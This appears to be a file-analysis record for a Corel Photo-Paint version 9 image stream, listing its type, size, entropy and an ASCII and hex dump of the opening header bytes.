File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00